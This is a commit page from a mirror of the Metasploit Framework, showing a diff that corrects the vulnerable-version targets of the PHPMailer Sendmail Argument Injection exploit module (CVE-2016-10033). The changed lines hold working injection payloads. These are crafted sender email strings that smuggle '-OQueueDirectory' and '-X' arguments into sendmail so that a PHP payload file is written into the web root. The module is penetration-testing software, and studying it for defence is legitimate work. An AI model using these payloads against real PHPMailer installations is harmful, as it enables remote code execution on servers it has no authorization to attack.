infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix PHPMailer targets since 5.2.20 is not affected

bug/bundler_fix
Spencer McIntyre 2016-12-30 15:31:15 -05:00
parent 1eab4b3a7d
commit cd90fd3b1c
1 changed files with 8 additions and 6 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

14
modules/exploits/multi/http/phpmailer_arg_injection.rb
View File

@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'PHPMailer Sendmail Argument Injection',
'Description' => %q{
PHPMailer versions up to and including 5.2.20 are affected by a
PHPMailer versions up to and including 5.2.19 are affected by a
vulnerability which can be leveraged by an attacker to write a file with
partially controlled contents to an arbitrary location through injection
of arguments that are passed to the sendmail binary. This module
@ -31,6 +31,8 @@ class MetasploitModule < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'References' => [
['CVE', '2016-10033'],
['CVE', '2016-10045'],
['EDB', '40968'],
['EDB', '40969'],
['URL', 'https://github.com/opsxcq/exploit-CVE-2016-10033'],
['URL', 'https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html']
@ -40,8 +42,8 @@ class MetasploitModule < Msf::Exploit::Remote
'Arch' => ARCH_PHP,
'Payload' => {'DisableNops' => true},
'Targets' => [
['PHPMailer <=5.2.18', {}],
['PHPMailer 5.2.20', {}]
['PHPMailer <5.2.18', {}],
['PHPMailer 5.2.18 - 5.2.19', {}]
],
'DefaultTarget' => 0
))
@ -95,10 +97,10 @@ class MetasploitModule < Msf::Exploit::Remote
payload_file_name = "#{rand_text_alphanumeric(8)}.php"
payload_file_path = "#{datastore['WEB_ROOT']}/#{payload_file_name}"
if target.name == 'PHPMailer <=5.2.18'
if target.name == 'PHPMailer <5.2.18'
email = "\"#{rand_text_alphanumeric(4 + rand(8))}\\\" -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\"@#{rand_text_alphanumeric(4 + rand(8))}.com"
elsif target.name == 'PHPMailer 5.2.20'
email = "\\\"#{rand_text_alphanumeric(4 + rand(8))}\\' -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\\\"@#{rand_text_alphanumeric(4 + rand(8))}.com"
elsif target.name == 'PHPMailer 5.2.18 - 5.2.19'
email = "\"#{rand_text_alphanumeric(4 + rand(8))}\\' -OQueueDirectory=/tmp -X#{payload_file_path} #{rand_text_alphanumeric(4 + rand(8))}\"@#{rand_text_alphanumeric(4 + rand(8))}.com"
else
fail_with(Failure::NoTarget, 'The specified version is not supported')
end